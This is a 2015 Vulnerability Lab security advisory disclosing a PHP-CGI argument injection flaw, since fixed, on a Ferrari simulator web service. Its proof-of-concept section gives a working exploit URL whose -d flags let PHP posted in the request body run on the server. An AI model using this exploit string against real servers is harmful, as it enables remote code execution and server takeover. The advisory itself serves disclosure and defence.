Ferrari - PHP CGI Argument Injection (RCE) Vulnerability

[Vulnerability Lab <research () vulnerability-lab com>]

Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: 
http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection


Release Date:
=============
2015-08-07


Vulnerability Laboratory ID (VL-ID):
====================================
1562


Common Vulnerability Scoring System:
====================================
9.2


Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello, Silverstone and Nürburgring), while HD 
screens literally wrap 
180 degrees around them, delivering ultra-realistic graphics to boot. The experience perfectly illustrates the concept 
of the new Ferrari Store, 
which was opened just two months ago and was conceived not merely as a shopping destination but also as an 
entertainment venue. 
With four F1 simulators, interactive video walls and numerous multisensory positions, the new 750 square meter space 
treats visitors to a 
completely immersive experience of the Ferrari legend. 

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )


Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official 
ferrari online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-08-07:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module 
takes advantage of 
the -d flag to set php.ini directives to achieve code execution. From the advisory: ``if there is NO unescaped `=` in 
the query string, the string is 
split on `+` (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the 
``encoded in a system-defined 
manner`` from the RFC) and then passes them to the CGI binary.`` This module can also be used to exploit the plesk 0day 
disclosed by kingcope and 
exploited in the wild on June 2013. (Source: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)


Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers without privilege application user account 
or user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

How I found the vulnerability: As part of any penetration test, fingerprinting is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12 which is known to be vulnerable to a Command 
execution vulnerability.

The Response: 
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

I started testing for this vulnerability manually and noticed code execution could be performed. When makeing a POST 
request to:

http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+
open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n

I noticed an error.
http://i.imgur.com/lFPgpyn.png

When sending some PHP script along with the POST request I noticed the script was executed. I sent this script: <?php 
echo(md5(kieran)); ?> and the right hash was returned.

I then did some automated testing with a metasploit script and this also gave positive results.

The exploit script can be found here: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

The POC with both manual and automated exploitation can be found here: hhttps://www.youtube.com/watch?v=vv7SMWC08eI


Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)


Security Risk:
==============
The security risk of code execution web vulnerability in the ferrari simulator online service is estimated as critical. 
(CVSS 9.2)


Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt